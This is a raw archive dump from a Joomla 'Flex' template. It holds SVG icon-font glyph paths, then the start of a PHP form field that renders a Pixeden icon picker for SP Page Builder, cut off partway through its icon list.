<glyph unicode="&#xe6b3;" d="M512 232.534h-50.346v102.4h-51.2v42.667h-68.267v-145.067h-170.667v145.067h-68.266v-42.667h-51.2v-102.4h-52.053v-17.066h52.053v-102.4h51.2v-42.666h68.266v145.066h170.667v-145.067h68.267v42.666h51.2v102.4h50.346v17.066zM69.12 130.134v187.733h34.133v-187.733h-34.133zM154.453 87.466h-34.133v273.067h34.133v-273.067zM393.387 87.466h-34.133v273.067h34.134v-273.067zM444.587 130.134h-34.134v187.733h34.134v-187.733z" />
<glyph unicode="&#xe6b4;" d="M455.68 247.040l-11.947-12.8-199.68 199.68 12.8 11.947-11.947 11.947-12.8-11.947-128.853-129.707 11.947-11.947 8.534 8.534 93.866-93.866-217.6-216.746 11.947-11.947 217.6 217.6 93.867-93.866-8.534-8.534 11.947-11.947 141.654 141.654-12.8 11.947zM334.507 125.866l-29.866 29.866 96.426 97.28 29.866-29.867-96.427-97.28zM292.693 168.534l-114.346 114.346 96.427 96.427 114.346-114.347-96.427-96.426zM232.107 421.974l29.867-29.867-95.573-97.28-29.867 29.866 95.573 97.28z" horiz-adv-x="468" />
<glyph unicode="&#xe6b5;" d="M426.666 249.6c0 117.76-95.574 213.333-213.333 213.333s-213.333-95.573-213.333-213.333v-87.040h0.854c0-2.56 0-5.12 0-6.827 0-56.32 45.227-102.4 101.546-102.4v0 204.8h-0.853c-35.84 0-66.56-17.92-84.48-46.080v37.547c0 108.374 87.894 196.266 196.267 196.266s196.267-87.893 196.267-196.266v-37.547c-17.92 27.306-49.493 46.080-84.48 46.080h-0.853v-204.8h0.853c8.534 0 16.214 0.853 24.747 3.413-25.6-24.747-57.173-41.813-93.013-50.346v29.866h-86.186v-51.2h85.333v3.413c54.613 11.094 101.546 42.666 132.267 87.040 23.040 18.774 38.4 47.786 38.4 80.214 0 2.56 0 5.12 0 6.827v0 87.040zM85.334 239.36v-167.254c-38.4 7.68-68.266 42.666-68.266 83.626s29.867 75.947 68.266 83.626zM238.934 2.134h-51.2v17.067h51.2v-17.067zM341.334 72.106v167.254c39.253-7.68 68.267-42.667 68.267-83.626s-29.014-75.947-68.267-83.627z" horiz-adv-x="427" />
<glyph unicode="&#xe6b6;" d="M494.933 215.466v17.066h-59.733c-1.707 46.080-19.627 87.040-48.64 119.467l42.666 42.666-11.947 11.946-42.666-42.666c-31.574 29.014-72.534 46.934-117.76 48.64v58.88h-17.066v-58.88c-45.227-1.707-86.186-20.48-117.76-48.64l-42.666 42.666-11.947-11.946 42.666-42.666c-29.867-32.427-48.64-73.387-50.346-119.467h-59.733v-17.066h59.733c2.56-45.226 20.48-86.187 48.64-116.906l-42.666-42.666 11.947-11.947 42.666 42.666c31.574-29.014 72.533-46.933 117.76-48.64v-61.44h17.066v60.587c45.226 1.707 87.040 20.48 117.76 48.64l42.666-42.666 11.947 11.947-42.666 42.666c28.16 31.574 46.933 71.68 48.64 116.906h61.44zM418.134 232.534h-102.4c-1.707 12.8-6.827 24.746-14.507 34.134l72.534 72.534c25.6-28.16 41.813-65.707 44.373-106.667zM247.466 172.8c-28.16 0-51.2 23.040-51.2 51.2s23.040 51.2 51.2 51.2c28.16 0 51.2-23.040 51.2-51.2s-23.040-51.2-51.2-51.2zM361.813 351.147l-73.387-73.387c-9.387 6.827-20.48 11.947-32.426 13.654v104.106c40.96-2.56 77.654-18.774 105.813-44.373zM238.934 395.52v-103.253c-11.946-1.707-23.040-5.974-32.427-13.654l-73.387 73.387c28.16 24.746 64.853 40.96 105.814 43.52zM121.174 339.2l72.533-72.534c-7.68-9.387-12.8-21.334-14.506-34.133h-102.4c2.56 40.96 18.773 78.506 44.374 106.667zM77.653 215.466h102.4c1.707-11.947 5.974-23.040 13.654-32.426l-71.68-71.68c-26.453 27.307-42.666 64-44.374 104.106zM133.12 98.56l71.68 71.68c9.387-7.68 21.334-12.8 34.133-14.507v-101.546c-40.96 2.56-77.653 18.774-105.814 44.373zM256 55.040v101.546c12.8 1.707 24.747 6.827 34.134 14.507l71.68-71.68c-28.16-26.454-64.853-42.666-105.814-44.373zM373.76 110.507l-71.68 71.68c6.827 9.387 11.947 20.48 13.654 32.426h102.4c-2.56-39.253-18.774-75.947-44.373-104.106z" horiz-adv-x="495" />
<glyph unicode="&#xe6b7;" d="M255.147 318.72v101.546h43.52v17.066h-298.666v-17.066h42.666v-101.546c0-28.16 11.093-62.293 86.187-98.987-64-30.72-86.186-58.026-86.186-103.253v-88.746h-42.666v-17.067h298.666v17.067h-43.52v88.746c0 45.226-22.186 72.534-86.186 104.106 75.094 35.84 86.186 69.974 86.186 98.134zM238.080 116.48v-88.746h-178.346v88.746c0 35.84 14.507 60.587 89.6 94.72 74.24-34.986 88.746-59.733 88.746-94.72zM148.48 229.12c-78.507 35.84-88.746 65.707-88.746 89.6v101.546h178.346v-101.546c0-23.894-11.094-53.76-89.6-89.6z" horiz-adv-x="299" />
<glyph unicode="&#xe6b8;" d="M273.067 212.906c0 114.346-76.8 197.974-136.534 267.094-59.733-69.12-136.534-152.746-136.534-267.094 0-107.52 79.36-135.68 128-151.040v-93.866h17.066v93.866c48.64 15.36 128 43.52 128 151.040zM145.066 79.786v66.56l53.76 53.76-11.946 11.947-41.814-41.813v173.226h-17.067v-81.92l-44.373 44.373-11.947-11.946 56.32-56.32v-157.866c-46.934 15.36-110.933 41.813-110.933 133.12 0 99.84 62.294 174.933 119.467 240.64 57.173-65.707 119.466-140.8 119.466-240.64 0-91.307-64-117.76-110.933-133.12z" horiz-adv-x="273" />
<glyph unicode="&#xe6b9;" d="M-0.113 28.229l222.651 222.651 12.068-12.068-222.651-222.652-12.068 12.068zM159.573 312.746h68.266v-17.066h-68.267v17.066zM347.307 312.746h68.267v-17.066h-68.267v17.066zM279.040 244.48h17.067v-68.266h-17.067v68.267zM279.040 432.214h17.067v-68.267h-17.067v68.267zM383.854 388.529l-48.278-48.264-12.066 12.070 48.278 48.264 12.066-12.070zM371.935 207.325l-48.278 48.264 12.066 12.070 48.278-48.264-12.066-12.070zM239.773 340.148l-48.278 48.264 12.066 12.069 48.278-48.264-12.066-12.069z" horiz-adv-x="416" />
<glyph unicode="&#xe6ba;" d="M236.374 388.693l3.413-16.213 130.56 29.866-128.853-129.707c-25.6 23.040-58.88 36.693-96.427 36.693-80.213 0-145.066-64.853-145.066-145.066s64.853-145.066 145.066-145.066c80.213 0 145.066 64.853 145.066 145.067 0 36.693-13.654 70.827-36.694 96.427l129.706 129.707-30.72-130.56 16.214-4.266 40.96 173.227-173.226-40.107zM145.066 36.267c-70.826 0-128 57.173-128 128s57.173 128 128 128c70.826 0 128-57.173 128-128s-57.173-128-128-128z" horiz-adv-x="410" />
<glyph unicode="&#xe6bb;" d="M256 202.666l-51.2 29.013v104.107c29.013 4.267 51.2 29.013 51.2 58.88 0 33.28-26.453 59.733-59.733 59.733s-59.733-26.453-59.733-59.733c0-29.867 22.186-54.613 51.2-58.88v-93.867l-51.2 29.013-136.534-55.466v-209.067l136.534 55.466 119.466-68.267 136.534 68.267v209.067l-136.534-68.267zM119.466 72.96l-102.4-40.96v172.374l102.4 41.814v-173.227zM153.6 394.666c0 23.894 18.773 42.666 42.667 42.666s42.666-18.773 42.666-42.666c0-23.893-18.774-42.666-42.666-42.666s-42.666 18.774-42.666 42.666zM256 12.373l-119.466 68.267v170.667l51.2-29.013v-75.094h17.066v65.707l51.2-29.014v-171.52zM375.466 72.106l-102.4-51.2v170.666l102.4 51.2v-170.666z" horiz-adv-x="393" />
<glyph unicode="&#xe6bc;" d="M477.866 336.64l-170.667 116.053v-64h-307.2v-392.534h392.534v283.307l85.334 57.173zM324.267 420.267l122.88-82.774-122.88-83.626v45.227c0 0 0 0 0 0v17.066h-30.72c-0.853 0-0.853 0-1.707 0-30.72 0-93.867-5.973-142.506-46.080 23.040 56.32 75.946 100.694 156.16 100.694v0c0 0 0.853 0 0.853 0s0 0 0.853 0h17.067v16.213c0 0 0 0 0 0.853v32.427zM375.466 12.373h-358.4v358.4h207.36c-68.267-29.867-104.96-98.133-104.96-168.96 39.253 87.040 130.56 98.134 172.373 98.134 5.974 0 11.094 0 15.36-0.854v-76.8l68.267 46.080v-256z" horiz-adv-x="478" />
<glyph unicode="&#xe6bd;" d="M357.546 242.774v0l-166.4 167.254-3.413-2.56v4.267c0 28.16-23.040 51.2-51.2 51.2s-51.2-23.040-51.2-51.2v-106.666l-70.826-70.827c-19.627-19.627-19.627-51.2 0-70.827l96.427-96.427c9.386-10.24 23.040-14.507 35.84-14.507s25.6 5.12 35.84 14.507l122.027 122.88h104.96l-52.053 52.906zM102.4 411.733c0 18.774 15.36 34.134 34.133 34.134s34.133-15.36 34.133-34.134v-21.334l-68.266-68.266v89.6zM297.813 206.933l-128-128c-5.974-5.974-14.506-9.387-23.893-9.387-8.534 0-17.066 3.413-23.040 9.387l-96.427 96.427c-12.8 12.8-12.8 34.134 0 46.933l144.214 143.36v-107.52h17.066v124.587l2.56 2.56 178.346-178.346h-70.827zM451.413 48.214c-5.12 46.080-54.613 107.52-54.613 107.52s-50.346-62.293-54.613-108.373c0-2.56 0-4.267 0-6.827 0-30.72 24.747-55.466 55.466-55.466s55.466 24.747 55.466 55.466c-0.853 2.56-0.853 5.12-1.707 7.68zM396.8 2.134c-21.334 0-38.4 17.067-38.4 38.4 0 1.707 0 2.56 0 4.267v0 0c2.56 25.6 22.187 58.88 37.546 81.92 15.36-22.187 34.986-56.32 38.4-81.067 0-1.707 0-3.413 0-5.12 0.853-21.334-16.214-38.4-37.546-38.4z" horiz-adv-x="453" />
<glyph unicode="&#xe6be;" d="M187.733 317.866v136.534h-136.534v-136.534h-51.2v-277.333c0-25.6 21.334-46.933 46.934-46.933h145.066c25.6 0 46.934 21.334 46.934 46.933v277.334h-51.2zM68.266 437.334h102.4v-119.466h-102.4v119.466zM221.867 40.534c0-16.214-13.654-29.866-29.867-29.866h-145.066c-16.213 0-29.866 13.654-29.866 29.866v260.267h204.8v-260.267zM85.334 411.733h17.067v-42.666h-17.067v42.666zM136.534 411.733h17.066v-42.666h-17.066v42.666z" horiz-adv-x="239" />
<glyph unicode="&#xe6bf;" d="M0 428.8v-409.6h426.666v409.6h-426.666zM17.067 171.094l119.466 125.44 118.614-118.613 59.733 51.2 88.746-90.454h-386.56v32.426zM409.6 36.267h-392.534v85.334h392.534v-85.334zM409.6 156.587l-93.014 96.427-59.733-51.2-120.32 119.466-119.466-125.44v215.893h392.534v-255.146zM315.733 292.267c23.894 0 42.666 18.774 42.666 42.666s-18.774 42.666-42.666 42.666c-23.894 0-42.666-18.773-42.666-42.666s18.774-42.666 42.666-42.666zM315.733 360.534c14.507 0 25.6-11.094 25.6-25.6s-11.094-25.6-25.6-25.6c-14.507 0-25.6 11.094-25.6 25.6s11.094 25.6 25.6 25.6z" horiz-adv-x="427" />
<glyph unicode="&#xe6c0;" d="M444.587 241.066h-9.387c-12.8 33.28-38.4 61.44-72.534 81.92 0 45.226 4.267 55.466 13.654 84.48-34.986-5.12-69.974-26.454-87.894-57.173-11.947 2.56-23.894 3.413-35.84 4.266 1.707 6.827 3.413 14.507 3.413 23.040 0 42.666-34.133 76.8-76.8 76.8s-76.8-34.134-76.8-76.8c0-21.334 8.534-40.106 23.040-54.613-33.28-19.626-58.88-46.933-72.534-79.36-23.040 8.534-35.84 21.334-35.84 37.547 0 17.92 14.507 34.133 27.306 38.4l-5.12 16.214c-21.334-5.974-39.254-29.867-39.254-52.906 0-13.654 5.973-39.254 46.934-54.613-3.413-11.094-4.267-22.187-4.267-34.133 0-42.666 21.334-81.92 55.467-110.933l-10.24-29.866c-6.826-20.48 3.413-41.813 23.894-48.64l23.894-8.534c4.267-1.707 8.534-2.56 12.8-2.56 16.214 0 30.72 10.24 36.694 25.6l6.827 19.627c17.066-3.413 34.133-5.974 52.906-5.974 11.946 0 23.893 0.853 34.987 2.56l10.24-21.334c6.827-13.654 20.48-21.334 34.986-21.334 5.974 0 11.094 0.853 17.067 4.267l22.187 11.094c18.774 9.387 27.307 32.426 17.92 51.2l-5.974 12.8c23.040 15.36 40.96 34.986 53.76 58.026h17.067c23.040 0 41.813 18.774 41.813 41.813v27.306c-2.56 23.040-21.334 41.814-44.373 41.814zM119.466 377.6c0 33.28 26.453 59.733 59.733 59.733s59.733-26.454 59.733-59.733c0-8.534-1.707-16.214-5.12-23.894-34.133-0.853-65.707-9.387-93.013-22.187-12.8 11.094-21.334 27.307-21.334 46.080zM469.334 171.947c0-13.654-11.094-24.747-24.747-24.747h-27.307l-5.12-8.534c-11.094-19.627-27.307-37.546-47.786-52.053l-11.947-8.534 6.827-12.8 5.974-12.8c5.12-10.24 0.853-23.894-10.24-29.014l-22.187-10.24c-2.56-1.707-5.974-2.56-9.387-2.56-8.534 0-15.36 4.267-19.627 11.947l-10.24 21.334-5.12 11.094-12.8-1.707c-11.094-1.707-22.186-2.56-32.427-2.56-16.214 0-33.28 1.707-49.494 5.12l-14.506 3.413-4.267-14.507-6.827-19.627c-3.413-8.534-11.094-14.507-20.48-14.507-2.56 0-5.12 0-6.827 0.853l-23.894 8.534c-11.094 4.267-17.067 16.214-12.8 27.306l10.24 30.72 4.266 11.094-9.386 7.68c-32.426 26.454-49.493 60.587-49.493 97.28 0 78.507 82.774 143.36 183.466 143.36 13.654 0 28.16-1.707 41.813-3.413l11.947-2.56 5.974 10.24c10.24 17.92 28.16 32.426 47.786 40.96-3.413-14.506-5.12-30.72-5.974-59.733v-9.387l8.534-5.12c30.72-18.773 54.613-44.373 65.707-73.386l4.267-11.094h21.334c13.654 0 24.747-11.094 24.747-24.747v-27.307zM375.466 228.267c0-11.782-9.551-21.334-21.334-21.334s-21.334 9.551-21.334 21.334c0 11.782 9.551 21.334 21.334 21.334s21.334-9.552 21.334-21.334z" horiz-adv-x="487" />
<glyph unicode="&#xe6c1;" d="M230.4 326.4c-37.547 0-68.266-18.773-68.266-42.666s30.72-42.666 68.267-42.666c37.546 0 68.267 18.774 68.267 42.666s-30.72 42.666-68.267 42.666zM230.4 258.134c-29.013 0-51.2 13.654-51.2 25.6s22.186 25.6 51.2 25.6 51.2-13.654 51.2-25.6-22.187-25.6-51.2-25.6zM429.226 317.866c4.267 5.12 5.974 11.094 5.974 17.92 0 23.894-30.72 42.666-68.267 42.666-19.627 0-36.693-5.12-48.64-12.8l-22.187 9.386c1.707 3.413 2.56 7.68 2.56 11.947 0 23.894-30.72 42.666-68.267 42.666s-68.267-18.773-68.267-42.666c0-4.267 0.853-7.68 2.56-11.947l-17.066-7.68c-11.946 6.826-28.16 11.093-45.227 11.093-37.546 0-68.266-18.773-68.266-42.666 0-5.12 1.706-10.24 4.267-15.36l-38.4-17.066v-168.96l230.4-98.134 230.4 98.986v168.106l-31.574 14.507zM230.4 212.053l-200.534 86.187 21.334 8.534c12.8-8.534 30.72-14.507 51.2-14.507 37.547 0 68.266 18.774 68.266 42.666 0 6.827-2.56 13.654-7.68 19.626l12.8 5.12c12.8-10.24 32.427-17.066 54.613-17.066s41.813 6.827 54.613 17.067l19.627-8.534c-3.413-5.12-5.974-11.094-5.974-17.066 0-23.894 30.72-42.667 68.267-42.667 18.774 0 35.84 4.267 47.786 11.947l16.214-6.827-200.534-84.48zM418.134 335.786c0-11.947-22.187-25.6-51.2-25.6s-51.2 13.654-51.2 25.6 22.187 25.6 51.2 25.6c29.014 0 51.2-13.654 51.2-25.6zM230.4 411.733c29.013 0 51.2-13.653 51.2-25.6s-22.187-25.6-51.2-25.6-51.2 13.654-51.2 25.6 22.186 25.6 51.2 25.6zM102.4 361.387c29.013 0 51.2-13.654 51.2-25.6s-22.186-25.6-51.2-25.6c-29.014 0-51.2 13.654-51.2 25.6s22.186 25.6 51.2 25.6zM17.067 285.44l204.8-87.894v-139.094l-204.8 87.894v139.094zM238.934 58.454v139.094l204.8 87.894v-139.094l-204.8-87.894z" horiz-adv-x="461" />
<glyph unicode="&#xe6c2;" d="M327.68 182.187l-17.92-125.44 122.026 18.774-47.786 48.64c16.214 29.866 25.6 63.147 25.6 99.84 0 113.494-91.307 204.8-204.8 204.8v-17.067c103.253 0 187.733-84.48 187.733-187.733 0-31.574-7.68-60.587-21.334-87.040l-43.52 45.226zM329.387 77.226l10.24 68.267 56.32-58.026-66.56-10.24zM17.067 224c0 45.226 16.213 86.187 42.666 118.613l52.053-52.906 17.92 125.44-122.026-19.627 39.254-40.96c-29.014-34.987-46.934-81.067-46.934-130.56 0-113.493 91.306-204.8 204.8-204.8v17.067c-103.254 0-187.733 84.48-187.733 187.733zM109.227 393.813l-10.24-68.266-56.32 58.026 66.56 10.24z" horiz-adv-x="431" />
<glyph unicode="&#xe6c3;" d="M170.667 360.534c-23.893 0-42.667-18.774-42.667-42.666s18.774-42.666 42.666-42.666c23.893 0 42.666 18.774 42.666 42.666s-18.774 42.666-42.666 42.666zM170.667 292.267c-14.506 0-25.6 11.094-25.6 25.6s11.094 25.6 25.6 25.6c14.506 0 25.6-11.094 25.6-25.6s-11.094-25.6-25.6-25.6zM256 177.067c0 61.44 0 131.413 0 157.014 0 47.786-31.573 112.64-85.334 145.92-53.76-33.28-85.334-98.134-85.334-146.774 0-25.6 0-95.573 0-157.014l-85.334-105.813h341.333l-85.334 106.666zM85.334 87.466h-49.493l49.493 62.293v-62.293zM238.934 87.466h-136.534v245.76c0 38.4 23.894 93.866 68.266 126.293 44.374-32.426 68.267-87.040 68.267-126.293v-245.76zM256 149.76l49.493-62.293h-49.493c0 14.507 0 36.693 0 62.293zM162.133 53.334h17.066v-85.334h-17.066v85.334zM204.8 53.334h17.066v-51.2h-17.066v51.2zM119.466 53.334h17.066v-51.2h-17.067v51.2z" horiz-adv-x="342" />
<glyph unicode="&#xe6c4;" d="M409.6 184.747l68.267 6.827v64l-68.267 6.827c-4.267 20.48-12.8 39.253-23.040 55.466l38.4 51.2-39.253 39.254-51.2-38.4c-16.214 10.24-34.986 18.773-54.613 23.040l-7.68 68.267h-64l-7.68-68.267c-19.626-4.267-37.547-11.947-53.76-22.187l-52.906 37.547-39.254-39.254 37.547-52.906c-10.24-16.214-17.92-34.134-22.186-53.76l-68.266-7.68v-64l68.266-7.68c4.266-19.627 12.8-38.4 23.040-55.466l-38.4-51.2 39.253-39.254 51.2 38.4c16.214-10.24 34.987-18.774 54.613-23.040l8.534-68.267h64l8.534 68.267c19.627 4.267 37.546 11.947 53.76 22.187l52.053-37.546 39.253 39.254-38.4 53.76c10.24 17.067 17.92 34.986 22.187 54.613zM460.8 241.066v-33.28l-51.2-5.12c0.853 6.827 1.707 14.507 1.707 22.186s-0.853 14.506-1.707 22.186l51.2-5.974zM383.147 387.84l18.774-18.774-28.16-38.4c-8.534 11.093-17.92 20.48-29.014 29.013l38.4 28.16zM221.867 445.866h34.133l5.974-51.2c-7.68 0.853-15.36 1.707-22.186 1.707-7.68 0-15.36-0.853-22.186-1.707l4.267 51.2zM75.094 368.214l19.626 19.627 39.254-27.307c-5.974-4.267-11.094-9.387-16.213-14.506s-10.24-10.24-14.507-16.214l-28.16 38.4zM17.067 206.933v34.133l51.2 5.974c-0.853-7.68-1.707-15.36-1.707-23.040s0.853-15.36 1.707-22.187l-51.2 5.12zM94.72 61.014l-18.773 17.92 28.16 38.4c8.534-10.24 17.92-20.48 28.16-28.16l-37.547-28.16zM256 2.134h-34.133l-5.974 51.2c7.68-0.853 15.36-1.707 23.040-1.707v0 0c7.68 0 15.36 0.853 23.040 1.707l-5.974-51.2zM238.934 69.546c-85.333 0-154.453 69.12-154.453 154.454 0 40.96 16.213 80.214 45.226 109.226s68.267 45.226 109.226 45.226v0c85.334 0 154.453-69.12 154.453-154.453 0-40.96-16.214-80.214-45.226-109.226s-67.413-45.226-109.226-45.226zM402.774 79.786l-18.774-18.774-39.254 28.16c5.974 4.267 11.094 9.387 16.214 14.507s9.387 10.24 14.507 16.214l27.307-40.106z" horiz-adv-x="478" />
<glyph unicode="&#xe6c5;" d="M162.133 437.334l-162.133-30.72c0 0 0-194.56 0-229.546 0-55.466 48.64-127.147 162.133-166.4 113.494 39.254 162.133 110.933 162.133 166.4 0 34.986 0 229.547 0 229.547l-162.133 30.72zM307.2 177.067c0-47.786-45.226-111.786-145.066-148.48-99.84 36.693-145.066 100.693-145.066 148.48v215.040l145.066 28.16 145.066-27.306v-215.894zM113.493 307.626l-12.8-11.946 51.2-51.2-51.2-51.2 12.8-11.947 50.346 51.2 51.2-51.2 11.947 11.947-51.2 51.2 51.2 51.2-11.947 11.947-51.2-51.2z" horiz-adv-x="325" />
<glyph unicode="&#xe6c6;" d="M204.8 428.8c-113.493 0-204.8-91.307-204.8-204.8s91.306-204.8 204.8-204.8c113.493 0 204.8 91.306 204.8 204.8s-91.307 204.8-204.8 204.8zM204.8 36.267c-103.254 0-187.733 84.48-187.733 187.733s84.48 187.733 187.733 187.733c103.253 0 187.733-84.48 187.733-187.733s-84.48-187.733-187.733-187.733zM311.466 175.36c-4.267 1.707-9.387 0.853-11.094-3.413-18.774-36.693-55.466-58.88-95.573-58.88-40.96 0-76.8 22.187-95.573 58.88-1.707 4.267-6.826 5.974-11.094 3.413-4.266-1.707-5.974-6.827-4.266-11.094 21.334-41.813 63.146-68.267 110.933-68.267 46.934 0 89.6 26.454 110.080 68.267 2.56 4.267 0.853 9.387-3.413 11.094zM162.133 266.667c0-14.139-11.462-25.6-25.6-25.6s-25.6 11.462-25.6 25.6c0 14.138 11.462 25.6 25.6 25.6s25.6-11.462 25.6-25.6zM298.666 266.667c0-14.139-11.462-25.6-25.6-25.6s-25.6 11.462-25.6 25.6c0 14.138 11.461 25.6 25.6 25.6s25.6-11.462 25.6-25.6z" horiz-adv-x="410" />
<glyph unicode="&#xe6c7;" d="M229.547 377.6h-58.88v-58.88h25.6v-40.96c0-9.387 0-15.36-9.387-24.746l-58.88-58.027v238.080l11.947-19.627 14.506 8.534-34.987 58.026-34.987-58.026 14.507-8.534 11.947 19.627v-308.053l-53.76 53.76c-9.386 9.387-14.507 17.067-14.507 23.040v40.106c14.507 3.413 25.6 17.066 25.6 33.28 0 18.773-15.36 34.133-34.133 34.133s-34.133-15.36-34.133-34.133c0-16.214 11.094-29.014 25.6-33.28v-40.106c0-14.507 10.24-26.454 19.627-34.986l66.56-66.56v-47.786c-19.626-4.267-34.133-21.334-34.133-41.813 0-23.894 18.773-42.666 42.666-42.666s42.666 18.774 42.666 42.666c0 20.48-14.506 37.546-34.133 41.813v117.76l70.826 70.827c14.506 14.506 14.506 26.454 14.506 36.694v40.96h16.214v58.88zM17.067 275.2c0 9.387 7.68 17.066 17.067 17.066s17.066-7.68 17.066-17.066c0-9.387-7.68-17.066-17.067-17.066s-17.067 7.68-17.067 17.066zM145.066 10.666c0-14.507-11.094-25.6-25.6-25.6s-25.6 11.094-25.6 25.6c0 14.507 11.094 25.6 25.6 25.6s25.6-11.094 25.6-25.6zM187.733 360.534h24.746v-24.746h-24.746v24.746z" horiz-adv-x="230" />
<glyph unicode="&#xe6c8;" d="M426.666 322.134l-15.36-15.36c-33.28 29.014-75.947 45.226-120.32 45.226-29.866 0-59.733-7.68-85.334-21.333l64.853 64.853c5.12-3.413 11.094-5.12 17.067-5.12 8.534 0 17.067 3.413 23.894 10.24 13.654 13.654 13.654 34.987 0 48.64-6.827 6.827-15.36 10.24-23.894 10.24s-17.067-3.413-23.894-10.24c-11.094-11.946-12.8-29.013-5.12-41.813l-81.92-81.92-15.36 15.36-41.814-41.814 15.36-15.36-83.626-83.627c-5.12 3.413-11.093 5.12-17.067 5.12-8.534 0-17.067-3.413-23.893-10.24-13.653-13.654-13.653-34.986 0-48.64 6.826-5.974 15.36-9.387 23.893-9.387s17.067 3.413 23.894 10.24c11.094 11.094 12.8 28.16 5.12 41.813l64.853 64.853c-34.133-65.707-26.453-147.626 23.893-205.654l-15.36-16.214 42.666-41.813 41.814 41.813-41.814 41.813-14.506-14.507c-49.493 58.026-52.053 141.654-10.24 203.094l6.827-6.827 42.667 41.814-7.68 6.827c27.306 19.626 60.587 29.866 94.72 29.866 40.106 0 77.654-14.506 108.374-40.106l-15.36-14.506 42.666-41.814 41.813 41.814-41.813 42.666zM197.12 32l-17.92-17.92-17.92 17.92 17.92 17.92 17.92-17.92zM275.627 436.48c3.413 3.413 7.68 5.12 11.947 5.12s8.534-1.707 11.947-5.12c6.827-6.827 6.827-17.067 0-23.894-3.413-3.413-7.68-5.12-11.947-5.12s-8.534 1.707-11.947 5.12c-6.827 5.974-6.827 17.067 0 23.894zM46.080 159.147c-3.413-3.413-7.68-5.12-11.947-5.12s-8.534 1.707-11.947 5.12c-3.413 2.56-5.12 6.827-5.12 11.947 0 4.267 1.706 8.534 5.12 11.947s7.68 5.12 11.947 5.12c4.267 0 8.534-1.707 11.947-5.12 6.827-6.827 6.827-17.92 0-23.894zM160.427 279.466l-17.92 17.92 17.92 17.92 17.92-17.92-17.92-17.92zM426.666 261.547l-17.92 17.92 17.92 17.92 17.92-17.92-17.92-17.92z" horiz-adv-x="469" />
<glyph unicode="&#xe6c9;" d="M253.44 453.546v0l-89.6-89.6c-54.614-54.613-56.32-141.654-5.974-198.827l-72.534-72.534-72.534 72.534-12.8-13.654 157.013-157.014 11.947 11.947-72.534 72.534 72.534 72.534c57.173-50.346 144.214-48.64 198.827 5.974l47.786 47.786h1.707v1.707l40.96 40.96-204.8 205.654zM355.84 169.387c-49.493-49.493-131.413-49.493-180.906 0-11.094 11.094-18.774 23.040-25.6 35.84h242.346l-35.84-35.84zM408.747 223.147h-265.387c-13.654 43.52-2.56 93.013 31.573 128l78.506 77.654 180.906-180.906-25.6-24.747z" horiz-adv-x="458" />
</font></defs></svg>PK!���2))$flex/sppagebuilder/fields/peicon.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2016 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

$doc = JFactory::getDocument();
$app = JFactory::getApplication();
$doc->addStylesheet( JURI::root(true) . '/templates/flex/sppagebuilder/fields/css/peicon.css');
$doc->addScript( JURI::root(true) . '/templates/flex/sppagebuilder/fields/js/peicon.js');
//$doc->addScript( JURI::root(true) . '/templates/flex/sppagebuilder/fields/js/fontawesome.js');

class SpTypePeicon{

	static function getInput($key, $attr)
	{

		if(!isset($attr['std'])){
			$attr['std'] = '';
		}

		// Depends
		$depend_data = '';
		if(isset($attr['depends'])) {
			$array = array();
			foreach ($attr['depends'] as $operand => $value) {
			  if(!is_array($value)) {
			    $array[] = array(
			      $operand,
			      '=',
			      $value
			    );
			  } else {
			    $array = $attr['depends'];
			  }
			}

			$depend_data = " data-depends='". json_encode($array) ."'";
		}
		
		//From SPPB 2.0 It is important to have class="sp-pagebuilder-form-group" bellow:
		$output  = '<div class="sp-pagebuilder-form-group"' . $depend_data . '>';
		$output .= '<label>'.$attr['title'].'</label>';

		if($attr['std']) {
			$output .= '<div class="pixeden-icon-chooser has-pe-icon">';
		} else {
			$output .= '<div class="pixeden-icon-chooser">';
		}

		$output .= '<div class="pixeden-icon-input">';

		if($attr['std']) {
			$output .= '<span><i class="pe pe-7s-'. str_replace('pe-7s-', '', $attr['std']) .' pe-3x"></i> '. str_replace('pe-7s-', '', $attr['std']) .'</span>';
		} else {
			$output .= '<span>--'. JText::_('COM_SPPAGEBUILDER_ADDON_ICON_SELECT') .'--</span>';
		}

		$output .= '<a class="remove-pe-icon" href="#"><i class="fa fa-times"></i></a><i class="fa fa-chevron-up"></i><i class="fa fa-chevron-down"></i>';

		$output .= '</div>';

		$output	.= '<input type="hidden" class="sp-pagebuilder-form-control sp-pagebuilder-addon-input addon-input-pe" name="'. $key .'" value="' . $attr['std'] . '">';

		$output .= '<div class="pixeden-dropdown">';

		$output	.= '<input class="sp-pagebuilder-form-control" type="text" placeholder="'. JText::_('COM_SPPAGEBUILDER_ADDON_ICON_SEARCH') .'" />';		
		
		$output .= '<ul class="pixeden-icons">';

		$pixeden_icons = self::getIconsList();

		foreach( $pixeden_icons as $icon )
		{
			
			if($attr['std'] == $icon) {
				$active_cls = ' active';
			} else {
				$active_cls = '';
			}
			
			$output .= '<li class="pe-list-icon'. $active_cls .'" data-pixeden_icon="'.$icon.'" data-pixeden_icon_name="' . $icon . '"><div><div><div><i class="pe '. $icon .' pe-3x"></i><span>'. str_replace('pe-7s-', '', $icon) .'</span></div></div></div></li>';
		}

		$output .= '</ul>';

		$output .= '</div>';
		$output .= '</div>';

		if( ( isset($attr['desc']) ) && ( isset($attr['desc']) != '' ) )
		{
			$output .= '<p class="sp-pagebuilder-help-block">' . $attr['desc'] . '</p>';
		}

		$output .= '</div>';

		return $output;
	}

	private static function getIconsList()
	{
		return array(
		'pe-7s-album',
		'pe-7s-arc',
		'pe-7s-back-2',
		'pe-7s-bandaid',
		'pe-7s-car',
		'pe-7s-diamond',
		'pe-7s-door-lock',
		'pe-7s-eyedropper',
		'pe-7s-female',
		'pe-7s-gym',
		'pe-7s-hammer',
		'pe-7s-headphones',
		'pe-7s-helm',
		'pe-7s-hourglass',
		'pe-7s-leaf',
		'pe-7s-magic-wand',
		'pe-7s-male',
		'pe-7s-map-2',
		'pe-7s-next-2',
		'pe-7s-paint-bucket',
		'pe-7s-pendrive',
		'pe-7s-photo',
		'pe-7s-piggy',
		'pe-7s-plugin',
		'pe-7s-refresh-2',
		'pe-7s-rocket',
		'pe-7s-settings',
		'pe-7s-shield',
		'pe-7s-smile',
		'pe-7s-usb',
		'pe-7s-vector',
		'pe-7s-wine',
		'pe-7s-cloud-upload',
		'pe-7s-cash',
		'pe-7s-close',
		'pe-7s-bluetooth',
		'pe-7s-cloud-download',
